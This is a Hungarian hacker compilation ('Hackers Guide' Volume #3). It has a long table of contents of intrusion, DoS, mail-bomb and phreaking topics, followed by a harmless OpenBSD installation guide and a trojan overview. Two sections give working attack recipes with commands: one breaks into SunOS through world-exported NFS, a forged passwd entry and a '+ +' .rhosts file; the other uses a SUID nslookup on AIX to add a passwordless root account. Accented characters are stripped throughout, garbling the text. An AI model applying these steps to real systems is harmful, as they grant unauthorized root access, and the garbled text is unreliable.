Hackers' Guide 3

Hackers Guide
by Phant0m
Volume #3
Hackers Guide
Tartalom: Volume #1 Elsz .......................................................................................................................... Trtnet ....................................................................................................................... Hacker-ek, cracker-ek, phreak-ek Billentys betolakodk Alternatv kultra: Hackerek Hackerek A trs mvszete Mi az igazsg Kevin D. Mitnick, a CyberKalz Hacker tallkoz Hollandiban A hacker kiltvnya Hacker-etika Fontosabb idpontok az Internet fejldsben Hlzattrtnelem A Byte magazin 98/4 -es szmban megjelent cikke Kezds ......................................................................................................................... A Hacker s trsai Els lpsek Ismertet a hackelsrl laikusoknak Kik a hackerek Mi is a cracker? Hogyan tevkenykedj illeglisan de biztonsgban Hogyan lesz az emberbl Hacker Hasznljatok PGP-t A titkostsrl A paranoirl Hack Windows all s tudnivalk Az IP szerzs mdszerei Social Engineering (trsadalommrnksg) Trashing or dumpster diving (kukabvrkods) Backdoors Mi is az a trojai program Pr sz a trojai programokrl Snifferek Keyloggerekrl ltalban Mi az IP, TCP/IP A WORLD WIDE WEB File Transfer Protocoll (FTP) GOPHER MI A TELNET Socks4 Protokoll Betrsek felfedezse s kezelse I. Betrsek felfedezse s kezelse II. Betrsek felfedezse s kezelse III. Betrsek felfedezse s kezelse IV. Betrsek felfedezse s kezelse V.
Hackers Guide
Betrsek felfedezse s kezelse VI. Anonimits .................................................................................................................. Nvtelensg ...avagy "Mindenki minket figyel!" Hogyan maradjunk ismeretlenek? Egyedi azonost? Proxy I. Proxy II. Proxy Hunter lers Password ..................................................................................................................... A jelszavakrl ltalban A linux passwd file felptse Jelszfeltrs Jelszavak trse Jelsztrs Passwd Re: Passwd PWL Hacking Tutorial Password fileok keresse Hogyan vlasszunk rossz jelszt CuteFTP bizonytalan jelsztrolsa BIOS Htsajtk BIOS jelszavak feltrse Denial of Service (DoS) .............................................................................................. Hogyan "ljjnk" ki msokat a netrl? s ln sttsg a click utn... A +++ath0 avagy a modemblitz NewTear DoS Tamadasok fajtai Internetto chat szivats NUKING IS LAMEEE.... Win98 TCP/IP bug D.o.S-ra alkalmas bug a W'2000-ben Pirch'98 ident/fserve daemon DoS tmads War FTP DoS (MKD/CWD) Email ............................................................................................................................ Fake Email Hogyan kldjnk lczott leveleket? (fakemail) Spoofed mail bombing by ReWtEr Levlbomba "Vgtelentett" E-MAIL A legegyszerubb mdszer levlbombzshoz A Freemailrol ugy altalaban Szex kepek e-mailre Levlbomba trlse Outlook Express levelek Outlook Express 5 bug
Hackers Guide
WinPopup s NetSend zenetek lczsa Volume #2 Linux ............................................................................................................................ Alap hack modszerek teoretikai oldala... Linux workstation trs Linux szerver trs Linux trs Egy lehetsges tmadsra plda Backdoorokrl gyakorlatban Unix Rendszerek Biztonsgi Lyukai Root jog szerezse, ha alap felhasznlo vagy Linux szerverek biztonsgi krdsei Unix parancsok, amelyeket ismerned kell IP Chains kiegszts Linux ipchains Firewall hiba Fakeuser Exploitok s a Telnet FTPCOVERSION bug Kernel bug WuFtpd trkk PING -R : kernel panic Hlozati Programozs C nyelven SAINT Windows ...................................................................................................................... Back Orifice NetBus 1.70 Lers Trjai programok feldertse WIN95/98 alatt I. Trjai programok feldertse WIN95/98 alatt II. Trjai programok feldertse WIN95/98 alatt III. Szempontok Windows trojan ksztshez Kevsb ismert Windows'9x biztonsgi lyukak Jelsz eltntetse Windowsrol Registryben trolt jelszavakrl Windows ScreenSaver Jelsz NT Password Cracker Windows NT munkalloms trse Windows NT szerver trse Windows NT bug Re: Windows NT bug Hogyan fagyasszunk Win-es gpet intraneten Windows nyomtatmegoszts - bug Hogyan szerezznk IP-t OP jog nlkl IIS 4.0 Microsoft Server Remote Exploit NT tmads FrontPage bug Minden az UNICODE bug-rl Internet Explorer tartalmi tancsad kikapcsolsa
Hackers Guide
Riched20.dll ActiveX I. ActiveX II. Novell ........................................................................................................................... Novell jelszavak a Windows alatt Novell LAN Hacking Novell rdekessgek Novell Groupwise bug IRC, ICQ ....................................................................................................................... Kt tz mgtt RFC-1459 A mi mIRC-nk... I. rsz: Popups A mi mIRC-nk... II. rsz: Aliases A mi mIRC-nk... III. rsz: Remote A mi mIRC-nk... IV. rsz: Sockets A mi mIRC-nk... V. rsz: Dialogs A mi mIRC-nk... VI. rsz: Ami az eddigiekbl kimaradt... Az IRC-harc alapjairl IRC Hacking Tutorial A null csatorna A #2,000 bug User klnozs Fake OP Fakedrop Flood mIRC flood vdelem mIRC jelsz kikapcsolsa mIRC 5.4 Kill mIRCkill patch Hogyan juss be egy csatira vagy szerverre, ha bannoltak? Az "eredeti nv"-ben vezrljelek hasznlata Az Eggdrop IRC bot Eggdrop 1.3.26 bug CTCP trkk DCC gyorsts Hogyan tevkenykedj (rj, csatlakozz csatira, stb.) ms nevben? Hogyan rejtsem el az IP cmemet IRC-n? WAC - WoRsITE A CoToCoP Advanced On-JOIN scanner Mirt ne irceljnk root-knt Hogyan puszttsunk IRC-n vagy ICQ-n ICQ exploit - avagy hogyan klonozzunk ICQ-ban ICQ Re: ICQ99 jelszavak CTCP-FAQ Web .............................................................................................................................. A site feltrs
Hackers Guide
Web-Hack F.A.Q. Flhivatalos Web-Hack FAQ A PHF MODSZER Hogy kell Unix ACCot szerezni 24 oraval ezen dokumentum olvasasa utan ?? Mi a .cgi .cgi Egyszeruen A test-cgi sebezhetsge bizonyos belltsoknl Nhny CGI bug csak rviden Kt .cgi exploit "Vadsz Gbor OnLine" jelszavak Jelszvdett weblapok feltrse Webes levelbomba kuldes [ fLip! ] Altavista.Com ...avagy a hackerek legjobb buntrsa Webterminl hackelsek Extra hack Re: Extra hack Hogyan hackeljk meg az Extra.Hu-t Emil.alarmix.org hack A /wwwadmin.pl Exploitrl Account Manager Password Exploit (amadmin.pl) Apexec.pl Bug Campas exploit Carbo.dll exploit Exploit a Microsoft IIS-hez HTML kd, ami leli az IE 5-t MailMachine.cgi bug QuikStore Shopping Cart Script bug Sambar Server bug Sambar Server search CGI bug Subscribe Me Exploit (subscribe.pl) Unstorekeeper.pl Bug .asp fjlok forrskdjnak megtekintse Phreak ......................................................................................................................... Klvrim a Matvval: avagy gyintzs RULEZ!!!! A 909 hasznlata Mi az a wardialer Wardialer 1.31 by MMan THC-Scan hasznlat + config Hvskorltozsfeltr 0.01 by Mman Ophacker 0.1 by MMan "06-80"-on keresztl klfldre A pnzbedobs telefonok hackolsa Amerikban s Angliban Mobildolgok SMS Flood www.777sms.hu-n keresztl Szivats mobiltelefonon keresztl Egy Matvos levele Volume #3
Hackers Guide
Egyb ........................................................................................................................... Hogyan tudunk konnyen es egyszeruen bejutni egy SunOs? Hogyan irjunk at barmilyen filet AIX rendszerben 0-as UID nelkul ? OpenBSD felhasznli tmutat Klnbz trjai programfajtk lersa me$$iah trojai program RSC's Offline Server Emulator AMaViS root exploit CD-k msolsvdelmnek megszntetse amstel.interware.hu feltrse Nyugatmagyarorszgi Egyetem feltrse Orszgos Szchenyi Knyvtr feltrse Fggelk ...................................................................................................................... Internet kissztr Linux Kissztr IRC sztr Phreak sztr Szabvnyos portok listja Nemzetkzi domain-ek A legismertebb trojai programok s portjaik I. A legismertebb trojai programok s portjaik II. BUHERTOR TESZT 1.1 BugTraq lista rszletek... Hasznos URL-ek gyjtemnye a szmtgpes biztonsg terletn
Egyb
Hogyan tudunk konnyen es egyszeruen bejutni egy SunOs serverre , felteve ha megfeleloek az adottsagok? Feltetel : Linux server , ahol lehetoleg root vagy , RPC program a celszerveren. mysite:~>/usr/sbin/showmount -e victim.site.com Ezzel a parancssorral kiirja a celszerveren levo export konyvtarakat , es
Hackers Guide
megmutatja ki altal lathato ez. Ha (everyone) akkor makod van. Ha viszont a parancssor beirasa utan ezt irja ki : RPC: Program not registered. Akkor ezzel a programmal ne probalkozz , igy nem tudsz ide bejutni :). Szoval mi is tortenik , ha megvannak a feltetelek: mysite:~>/usr/sbin/showmount -e victim1.site.com /usr victim2.site.com /home (everyone) ->a /home konyvtarat barki lathatja:) /cdrom (everyone) mysite:~>mkdir /tmp/mount mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/ ->be kell mountolni a konyvtarat mysite:~>ls -sal /tmp/mount total 9 1 drwxrwxr-x 8 root root 1 drwxr-xr-x 19 root root 1 drwxr-xr-x 3 at1 users 1 dr-xr-xr-x 8 ftp wheel 1 drwxrx-r-x 3 john 100 1 drwxrx-r-x 3 139 100 1 -rw------- 1 root root 1 drwx------ 3 test 100 1 drwx------ 15 102 100
1024 Jul 4 20:34 ./ 1024 Oct 8 13:42 ../ 1024 Jun 22 19:18 at1/ 1024 Jul 12 14:20 ftp/ 1024 Jul 6 13:42 john/ 1024 Sep 15 12:24 paul/ 242 Mar 9 1997 sudoers 1024 Oct 8 21:05 test/ 1024 Oct 20 18:57 rapper/
Megjegyezendo , hogy mountolni altalaban csak root jogokkal lehet! Tehat : mysite:~>id uid=0 euid=0 mysite:~>whoami root mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd Mit is csinaltunk most? -> Az ls -sal paranccsal megelestuk a /tmp/mount konyvtarunkban levo bemountolt home konyvtarban levo dolgokat. Itt talaltunk egy rapper usert , akinek 102 az uid-je. Ezek utan hozzafuzunk egy sort a passwd file-unkhoz /ROOT JOG!!/ amibe behelyezzuk a user nevet es a uid-jet. mysite:~>su - rapper Welcome to rapper's user. -> Ezek utan siman su paranccsal belephetunk az aldozat user nevere.
Hackers Guide
mysite:~>echo "+ +" > rapper/.rhosts -> Letrehozunk egy .rhosts nevu filet,amihez hozzarakunk 2 + +/az rloginhoz szukseges/ mysite:~>cd / mysite:~>rlogin victim1.site.com Welcome to Victim.Site.Com. SunOs ver....(crap). victim1:~$ -> rloginnal szepen belepunk :) Ezek utan kovetkezik a Root meghackelese :) , amit most meg nem irom le , mert meg nekem sem volt alkalmam kiprobalni. De a fent emlitett dolgok mukodnek. Jo szorakozast! Woodoo E-mail:hackwood@freemail.c3.hu
************************************************************************************************
Hogyan irjunk at barmilyen filet AIX rendszerben 0-as UID nelkul ? Az AIX rendszer install utan az /usr/bin/nslookup rootos SUID-al fut, hogy miert, azt senki sem tudja ;-) A 4.x-es rendszernel ez biztos igy van, a tobbinel nem tudom, mas verzioju AIX-al meg nem talalkoztam. Ha egyeb UNIXos rendszeren is SUID-al fut az nslookup, akkor ott is mukodik. Nos, hogyan hasznaljuk ki, hogy SUID-al fut? Pofon egyszeruen. $ nslookup : hello vilag! >/etc/passwd Na ez nem jo moka, mert felul irjuk az /etc/passwd -t. ellenben: : rootocska::0:0:hehe:/root:/bin/sh >>/etc/passwd igy nem felulirjuk, hanem appendaljuk. Ha egy filet ilyen modszerrel hozunk letre ill. appendalunk, akkor az nslookup el kezd valamit pofazni, de erre ne figyelj oda, nem erdekes, mar megcsinalta a filet. FIGYELEM !!! Elmeletileg ez igy mukodne is, de nekem a 4.2.1-es AIX-nal (meg
Hackers Guide
lehet, hogy mas rendszernel is) ha olyan filet irok felul ill. appendalok amihez eredetileg nem lenne jogom, akkor az eredeti szoveg helyett valami hiba uzenet (is) bekerul a fileba. Tehat mielott kiprobalnad gyozodj meg rola, hogy minden rendben mukodik, mert a passwd file elbaszasa sulyos karokat okoz a rendszerben. Akinek meg direkt ez a celja, az szegyelje magat ! -=[Ubul]=-
************************************************************************************************
OpenBSD felhasznli tmutat
Bevezet Az OpenBSD a 4.3BSD NET/2-n s a 4.4BSD-Lite-on alapul NetBSD 1.1-bl vlt kln fejlesztsi irnyzatt. A 2.3-as verzitl mr 4.4BSD-Lite2-re pl. A rendszer fejlesztsnek sorn nagyon komoly hangslyt helyeztek annak biztonsgra. Minden kritikus rsz kln tesztelve lett a fejlesztk ltal, akik kztt komoly biztonsgi szakemberek is vannak, gy a kd nagy rsze sorrl-sorra auditlt. Ezt a filozfit kvetve a disztribciban megtallhat j nhny hlzatbiztonsgi s kriptogrfiai program is, a jelszavak elkdolsa blowfish algoritmussal trtnik, szemben az ltalnosan hasznlt DES-sel s mg sorolhatnnk. A rendszer kitnen dokumentlt. Rvid, tmr, rthet stlusban rdott man-ok s FAQ-k segtik a felhasznlt, ezekben szinte minden informcit megtallunk. A dokumentciban s a manual-okban mindentt kitrnek a biztonsgi krdsekre. Az olvashatsg rdekben az utastsok fix szlessg-ek, az egyb billentyzetrl bevitt szveg pedig flkvr. 1. Hardver Napjainkban szinte teljesen elmosdik a hatr szerver s kliens kztt, a forgalomban lv hardver tekintetben. St! Amg nem sokkal ezeltt mg a szerverek ignyeltk a nagyobb kapacitst, teljestmnyt a hardvertl s a kliensek kevesebbet, ez az arny eltoldni ltszik a kliensek fel. A hardverelemek megbzhatsgnak krdsben azonban nincs vltozs. Ha szervert akarunk pteni, nagyon fontos, hogy j minsg alkatrszekbl tegyk. Ez persze drgbb, de ne feledjk, hogy nem lehetnk mindig a gp mellett, mint ahogy egy munkalloms esetn ezt megtehetjk. Ezrt ne sajnljuk a pnzt paritsos vagy mg inkbb ECC RAM, SCSI merevlemez, mrks alaplap, PCI-os, megbzhat hlzati csatol (pl. SMC, Intel ne csak valami NE2000 kompatibilis vacak; a 3com nem igazn j vlaszts, de vigyzzunk a Tulip krtykkal is), j minsg hz s
10
Hackers Guide
tpegysg beszerzsre. Az gy elklttt pnz egy rszt visszanyerhetjk a videokrtyn s az egyb perifrikon (egr, billentyzet, monitor). Ezekbl ugyanis elg az olcsbb minsg, monitorra s egrre pedig egy szerver mkdse kzben ltalban nincs szksg. A tmogatott hardverek listjt az INSTALL.[architektra] file tartalmazza. 2. Els lpsek 2.1 A disztribcirl Az OpenBSD fejlesztse ersen "kzpontostott", ahogy az a BSD-k csaldjban szoks. Ez igaz a kernelre s a kr pl disztribcira is. Ebbl addik, hogy nincsenek klnfle disztribcik, mint a Linux esetben. A legfrissebb disztribci verziszma 2.6, ezt 1999. decemberben adtk ki. Emellett ltezik egy "fejleszti" verzi, amit "snapshot"-nak hvnak. Ebbe kerlnek az j library-k, programok, stb, majd az elz kiadst kvet kb. 6 hnap mlva ebbl lesz a kvetkez disztribci. Snapshot teleptsvel akkor rdemes ksrletezni, ha mr rendelkeznk bizonyos tapasztalatokkal az OpenBSD-vel kapcsolatban, br az esetek nagy rszben van annyira stabil s megbzhat, mint a disztribci maga. 2.2 A telept kszlet beszerzse Ezt megtehetjk zletben (vagy nem, mivel nem ismerek haznkban olyan zletet, ahol OpenBSD CD kaphat lenne), megrendelssel (errl a http://www.openbsd.org/orders.html oldalon tallunk informcit) vagy valamely publikus FTP site-rl val letltssel. Az mirror site-ok listja elrhet a http://www.openbsd.org/ftp.html oldalon. 2.3 Telepts A tovbbiakban a 2.6-os disztribci i386-ra kszlt rsze kerl ismertetsre. 2.3.1 A disztribci tartalma INSTALL.i386: Segdlet a rendszer installlshoz s a tmogatott hardverek listja. CKSUM, MD5: A cksum s az md5 program outputja, segtsgkkel ellenrizhet a file-ok srtetlensge. floppy26.fs: Boot image - lemezrl val boot-olshoz az installlskor. bsd: A kernel. base26.tar.gz: A rendszer mkdshez szksges programok s shared lib-ek. comp26.tar.gz: C, C++ s FORTRAN fordt, linker, include file-ok, lib-ek s manjaik. etc26.tar.gz: A rendszer mkdshez szksges konfigurcis llomnyok. game26.tar.gz: Jtkok s dokumentcijuk. man26.tar.gz: A "base" csomagban lv programok man-jai. misc26.tar.gz: Rendszer dictionary-k, dokumentcik. xbase26.tar.gz: Az X mkdshez szksges binrisok, lib-ek, header s konfigurcis file-ok. xshare26.tar.gz: A kzs file-ok klnbz architektrkon. xfont26.tar.gz: X fontok. xserv26.tar.gz: Az X szerverek. xlink26.tar.gz: Az X szerver belltshoz szksges csomag. 2.3.2 Telepts CD-rl Ha CD-nk boot-olhat, a boot lemez ksztst elkerlhetjk. Ellenkez esetben a 2.3.3 fejezetben lert mdon kell boot lemezt ksztennk.
11
Hackers Guide
A telepts folyamata egyszer. A gp indtst kveten a "boot>" prompt-nl ssnk egyszeren Enter-t. Ha a prompt nem jelenik meg, annak valsznleg lemez, CD vagy egyb hardverhiba az oka. Ha minden rendben, vrjuk meg a kernel betltdst, ami a gp sebessgtl fggen ltalban 0.5 - 2 perc. A folyamat vge fel kapunk nhny hibazenetet (nincs swap, stb.). Ezek nem kritikusak, ne foglalkozzunk velk, lpjnk tovbb Enter-rel. Az install program megkrdezi, hogy installlni akarunk-e vagy upgradelni a jelenlegi OpenBSD disztribcit gpnkn. ssnk i-t, azaz installlni akarunk. Most a hasznlt terminl tpusra vonatkoz krdst kapunk, amire szintn elg csak Enter-t tni. Ezutn a program kilistzza az elrhet merevlemezek azonostjt, majd rkrdez a cl azonostjra. Ez IDE esetn ltalban "wd0" (a "wd" kd jelenti az IDE eszkzt, a "0" pedig a sorszmt, azaz a "wd0" az els IDE eszkz a gpben), SCSI-nl "sd0". Adjuk meg a megfelelt. A kvetkez krds arra vonatkozik, hogy akarjuk-e a teljes lemezterletet az OpenBSD hasznlatba adni. Vlaszoljunk yes-szel. Persze lehetsges az OpenBSD mellett ms opercis rendszer hasznlata is, de mi csak ezzel az esettel foglalkozunk, mivel szervereknl ez az ltalnos. A partcik belltsa kvetkezik. Az alapvet opcik:
a j partci ltrehozsa. Megadsakor szp sorban vgigkrdezi, melyik partci honnan kezddjn, mekkora legyen s milyen knyvtr al legyen mountolva a rendszerben, illetve mg nhny ms dolgot, amelyekre elg Enter-rel vlaszolni. d partci_azonostja Partci trlse. A partci azonostja az a karakter, amit a p parancs kir. p Kirja a ltez partcikat s adataikat.
Clszer kln /, /tmp, /usr, /var s /home partcikat ltrehozni. Nhny sz a partcik azonostirl - a standard kioszts:

a: nincs lefoglalva, ltalban a / b: swap c: lefoglalt, a partcionlatlan lemezterlet azonostja d-: egyb partcik
Ennek befejeztvel egy w + Enter, majd egy q + Enter kiadsa (ezzel elmentettk a belltsokat) utn jra vgigkrdezi, mely knyvtrak al akarjuk mountolni a partcikat. Ha elzleg jl belltottuk, ssnk csak Enter-t minden krdsre. Ekkor - ha tbb merevlemez van a gpben - rkrdez, akarjuk-e a tbbit is partcionlni. Ha igen, az elz folyamatot kell vgigjtszani. Ha nem, done s ksz. Mieltt vgleg tovbblpne, mg egyszer visszakrdez, jk-e a belltsok. ssnk Enter-t, ha minden rendben. Eddig megvolnnk. Most kapunk egy figyelmeztetst, hogy a kvetkez lps minden meglv adatot fellr. Akarjuk? Ht persze. Enter s mehet.
12
Hackers Guide
Kvetkezik a hlzat belltsa. Ez a lps elhagyhat, ha CD-rl installljuk a rendszert s ksbb akarjuk a belltani. Vlaszoljunk n-nel ebben az esetben, klnben y-nal. Els krds: mi legyen a gp hostneve? rjuk be (domain nv nlkl), majd Enter. A kvetkez krds a domain nv. Tltsk ki ezt is. Kapunk egy listt a hlzati interfszekrl, majd a program megkrdezi, akarjuk-e az elst konfigurlni. Ht persze. Az itt kvetkez adatok kitltse rtelemszer, most nem rszletezzk. Ennek vgeztvel rkrdez, akarjuk-e a kvetkez interfszt is belltani (ha van ilyen)? Vlaszoljunk ignyeink szerint. Ha ez megvan, rkrdez a "default route"-ra. Ez ltalban a router IP cme. Adjuk meg neki. Ezt kveti a name szerver cme utni rdeklds. Vlaszoljunk erre s a kvetkez krdsre is, ha szksges. Ezzel vge a hlzati belltsoknak. A program mg rkrdez, akarunk-e egyb belltsokat eszkzlni. Tegyk fel, hogy nem s ssnk Enter-t. Most mg egyszer, utoljra kirja a partcik adatait, majd rkrdez a root jelszra. Vlasszunk valami nem tl trivilisat, amit azrt nem felejtnk el s ismteljk meg. A rendszer felmsolsa kezddik a krdssel: honnan akarjuk? Vlaszoljunk c-vel a CD-s telepts kivlasztshoz. Ha megtrtnt, a program felsorolja az elrhet CDket. Vlasszuk ki azt, amelyikben a disztribci CD lemeze van (tbb CD esetn), majd a "partci ..." krdsre ssnk Enter-t. Ezutn a CD lemezen lv file-rendszer tpust kell megadnunk, ami szinte mindig cd9660. Vlasszuk ki ezt s adjuk meg a "mount point"-ot (a knyvtr, ahol a disztribci file-jai tallhatk). ltalban csak Enter-t kell tni. Ha eddig minden sikerlt, kapunk egy felsorolst, amelybl a neknk szksges/felesleges csomagokat kell kivlasztani. Ezt a csomag neve el rt - jellel tehetjk, amennyiben nincs r szksgnk, a + jel a csomag neve eltt pedig kijelli felmsolsra. Ha ezzel kszen vagyunk, rjuk be: done. Ekkor a program rkrdez: Kszen llunk a csomagok tartalmnak felmsolsra? Tegyk fel, hogy igen... s ssnk Enter-t. Ezzel a msols elkezddik. Ennek befejeztvel kapunk egy krdst: "Akarunk ms csomagokat is feltenni?" Most nem, teht Enter a vlasz. A kvetkez teendnk az idzna belltsa. Vlasszuk ki a neknk megfelelt. Ezzel is megvolnnk, most kaptunk egy csom adatot a merevlemezrl. rljnk. (Ha nem rlnk, azt jelenti, hogy elszrtunk valamit :)) A krdsre (Akarunk-e X-et hasznlni?) vlaszoljunk tetszsnk szerint. Ennyi volna. Ha most berjuk: reboot, a gp jraindul s mris egy OpenBSD boldog rendszergazdi vagyunk. 2.3.3 Telepts FTP szerverrl Els lps: boot lemez felrsa (Vigyzzunk, a lemeznek 1.44MB-osnak kell lennie, klnben nem fr r az image!):
Ms UN*X-on: dd if=floppy26.fs of=/dev/fd0 bs=32k

13
Hackers Guide

DOS, Win3x, Win9x alatt: rawrite.exe NT alatt: ntrw.exe
Az gy elkszlt lemezrl boot-olva mr ugyanazt a folyamatot kell vgigjtszani, mint a CD-s teleptsnl. A klnbsg csak annyi, hogy nem a CD-t adjuk meg a "honnan" krdsre, hanem f-et tnk, azaz FTP szerverrl akarunk telepteni. Ha gy tesznk, megkrdezi majd a szerver cmt s egy usernv+password prost a szerverre val bejelentkezshez. A telepts folyamata innen mr megegyezik a CDs teleptssel. 2.4 A frissen teleptett rendszer belltsa jonnan teleptett rendszernk hasznlatba vtelt kezdjk az adduser utastssal s hozzunk ltre egy nem privilgizlt felhasznlt, amelynek nevben a dolgozni fogunk. A rendszer ezt minden root-knt val bejelentkezskor kzli is velnk, biztonsgi okokbl. Az adduser program elg felhasznlbart, minden adatra rkrdez, amit szksges megadnunk, ezzel is cskkentve a hibk elkvetsnek eslyt. Ha ezzel megvagyunk, lpjnk is ki, majd jelentkezznk be a ltrehozott felhasznl nevben. Most mr kiadhatjuk a man afterboot parancsot, amely rszletes segtsget ad a rendszer tovbbi belltshoz. 2.4.1 Az elre lefordtott csomagok (package-ek) Ha a disztribci knyvtrlistjt tanulmnyozzuk, tallunk egy "packages" nev knyvtrat, benne a disztribcihoz elre lefordtott programokkal. Ezeket a pkg_add csomagnv paranccsal knnyedn feltehetjk a rendszerre. A teleptett csomagok listjt a pkg_info utasts segtsgvel krhetjk le. Ha el akarunk tvoltani egy csomagot, hasznljuk a pkg_delete csomagnv utastst. 2.4.2 Port kollekci A CD-n vagy FTP szerveren bizonyra lttuk mr a ports.tar.gz file-t. Ezt a /usr alatt kibontva kapunk egy ports/ knyvtrat, benne kategrikba szervezve az OpenBSD alatt lefordthat programok knyvtrlistjval. (A lista korntsem teljes, mivel a port kollekcit is csak emberek ksztik. Ennek ellenre szinte minden fontosabb programot megtallunk.) Az egyes programok knyvtrban tallhat Makefile nev llomnyrl mr lehet sejteni, hogy egy make install utasts segtsgvel a krt program forrsa letltdik, majd lefordtdik. A sikeres fordts utn a binrisok a helykre kerlnek (a fordts szinte mindig sikeres) s a program bekerl a pkg adatbzisba (azaz a pkg_* parancsok hasznlhatk). rdemes odafigyelni, ugyanis a konfigurcis llomnyok nem msoldnak be maguktl a */etc-be - ezt neknk kell kzzel megtennnk, ugyanis az OpenBSD filozfijnak fontos eleme, hogy a rendszer nem teszi lehetv az sz nlkli installlgatsokat, mivel ez szinte mindig a biztonsg rovsra megy. Ezt a filozfit tkrzi a rendszer egsz csomagkezelse is. Egy kezd felhasznl knnyen hozhat errl elhamarkodott tleteket, de nem feledjk: az OpenBSD szerver opercis rendszer - kliensknt nem hasznlhat olyan knnyedsggel, mint a FreeBSD vagy a Linux s nem is tmogatja a hardvereszkzknek azt a szles spektrumt, mint az emltettek. Szerverknt azonban teljestmny s megbzhatsg tekintetben komolyan felveszi a versenyt mindkettvel, a biztonsg tern pedig nem is sszehasonlthatk...
14
Hackers Guide
2.4.3 CVS (Concurrent Versions System) Biztosan tallkoztunk mr olyan problmkkal program vagy dokumentci keszts kzben, amikor j lett volna, ha a rgi verzi(k) is rendelkezsnkre ll(nak), esetleg szksgnk lett volna Changelog-ra. A CVS erre lett kitallva, de emellett mg szmtalan hasznos funkcit tartalmaz. Olyan sokat, hogy ebben a dokumentumban nem is lenne clszer mindet lerni, gy csak azokkal foglalkozunk, amelyekre szksgnk lehet rendszernk tovbbi fejlesztse s karbantartsa sorn. Kezdjk taln a a port kollekci letltsnek pldjval: cvs get ports Ugye milyen egyszer? Csakhogy ez gy nem fog mkdni, szksgnk van mg kt krnyezeti vltoz belltsra: setenv CVSROOT anoncvs@anoncvs.ca.openbsd.org:/cvs Ezzel belltottuk a CVS szervert, amirl le akarunk tlteni. setenv helyett rjunk export-ot, ha nem csh-t vagy tcsh-t hasznlunk. A kvetkez: setenv CVS_RSH ssh Ez csak akkor szksges, ha a rendszeren nincsenek az RPC szolgltatsok engedlyezve vagy nincs rsh-nk. Biztonsgi okokbl azonban mindig rdemes hasznlni, mert gy a forgalom kdolva lesz, ellenttben az rsh-val, ami minden adatot - mg a jelszavakat is! - plain text-ben visz t. Ha ezt a kt vltozt belltottuk, az elszr lert utasts mkdni fog. Ha el akarjuk kerlni a krnyezeti vltozk definilst vagy csak jobban szeretjk az egysoros megoldsokat, akkor: cvs -d $CVSROOT get ports A $CVSROOT helyre rtelemszeren a CVSROOT vltoznl megadott rtket kell behelyettesteni. Clszer azonban a kvetkez formban hasznlni: cvs -q get -PA ports A "-q" paramter rbeszli a cvs-t, hogy csak a legfontosabb zeneteket rja a kpernyre. Ha frissteni akarjuk a port kollekcit, gy rdemes: cvs up -PAd ports A CVS_RSH s a CVSROOT vltozk rtkt update esetn nem kell jra belltani, azokat az rtkeket fogja hasznlni, amit a "get"-nl megadtunk. Ha ezt mgis fell akarjuk brlni, a kvetkez formban adjuk ki a parancsot: cvs up -d username@masik.szerver:/cvs -PAd ports Ezzel meg is volnnk. Annyit mg rdemes megjegyezni, hogy az elrhet CVS szerverek listjt a http://www.openbsd.org/anoncvs.html cmen talljuk. 2.4.4 Kernel fordts Nem kell megijedni. Nem valami mgikus dologrl van sz. Aki Linux alatt fordtott mr kernelt, tudja, hogy viszonylag egyszer mvelet. OpenBSD alatt vlemnyem szerint mg egyszerbb, csak kvessk az tmutatst. Els lps - a kernel forrs letltse: cd /usr/src cvs get -PA sys (Ne felejtsk el belltani a CVSROOT s a CVS_RSH vltozkat sem.) Ez eltarthat egy ideig, attl fggen, mekkora svszlessg ll rendelkezsnkre a kivlasztott CVS szerverig. Ha ezzel megvagyunk, kvetkezik a 2. lps - a kernel konfigurlsa: cd sys/arch/i386/conf
15
Hackers Guide
cp GENERIC SAJATKERNEL vi SAJATKERNEL Ezzel el is kezdtk szerkeszteni a sajt kernel belltsunkat. A SAJATKERNEL file kommentjei, illetve a man options segtenek eligazodni. Nincs ms teendnk, mint az "options" sorok kikommentezse abban az esetben, ha nincs szksgnk rjuk. Ha vgeztnk, mentsk el a file-t s lpjnk ki az editorbl. 3. lps - a belltsok rvnyestse: config SAJATKERNEL 4. lps - fordts: cd ../compile/SAJATKERNEL make clean; make depend; make Ez is el fog tartani egy ideig, a processzor s a merevlemez sebessgtl, illetve a rendelkezsnkre ll memria mrettl fggen. Ha kszen van, nincs ms dolgunk, mint: mv /bsd /bsd.old cp bsd /bsd s indthatjuk is jra a gpet, mr az j kernelt fogja hasznlni. Nhny esetben nincs ilyen egyszer dolgunk, ritkn ugyan, de elfordulhat, hogy a megadott belltsokkal a kernel nem fordul le. Ha magunktl nem jvnk r ennek okra, krjk hozzrt segtsgt. Ha elgg rtnk hozz, hogy meg tudjuk llaptani, nem valami trivilis oka van a hibnak, rhatunk az OpenBSD-tech listra segtsgrt, de eltte mg ellenrizzk, nem fordult-e mr mssal is el a problma nzzk meg az archvumot. A http://www.openbsd.org/mail.html oldalon megtallhat minden informci a levelezsi listkrl.
Copyright Srgli Attila (sragli@choraii.com), 1999. A dokumentum eredeti formjban szabadon, rszletekben a szerz megjellsvel terjeszthet. Ksznet Miskey Sndornak, javaslatairt s a kritikkrt.
************************************************************************************************
Klnbz trjai programfajtk lersa
Tvoli adminisztrcis trjaiprogramok: Ezek a programok most a legnpszerbbek most. Ezeket ltalban arra hasznljk, hogy hozzfrjenek msok rendszerhez. A hasznlatuk is rettent egyszer. Csak az ldozatot r kell brni arra, hogy futtassa le a gpn a szerver rszt a programnak s mrus FULL elrst akpunnk a rendszerhez. Lehet feltlteni,
16
Hackers Guide
letlteni, a eltrolt jelszavakat megjelenteni, az aktulis kpernyt lementeni, cd-ajtt nyitogatni =) ... stb. Vagyis mindent megtehetsz amit a felhasznl megtehet a gpvel! Sok ember rossz szndkkal hasznlja ezeket. k egyszeren csak trlnek s trlnek. Ez utbbi elgg pancser dolog, s aki csak ere kpes az komolyan vizsgltassa meg magt egy llekturksszal! =( Sajnos elg sok trjai scanner van ami mr felismeri a programokat de mindg jnnek ki jabbak s gy mindg a trojai programok vannak elnyben, 1 lpssel szval nem szabad jhiszemen megbzni az antivirus s egyb programokban! ltalnossgban elmondhat, hogy szinte mindegyik trjai automatikusan elindul minden windows indtskor. Ez annyit tesz, hogy vagy a regisztrcis-adatbzisba fszkeli be magt (leggyakrabban), vagy a win.ini/system.ini -be r bele (kevss gyakrbban) vagy pedig a kzvetlen fjl-ba rs technikjt alkalmazza. (Ez utbbi a szerver becsempszsnek egyik legjobb mdja.) A legtb ilyen program egy szimpla programnak nz ki (legtbbszr a windows\system 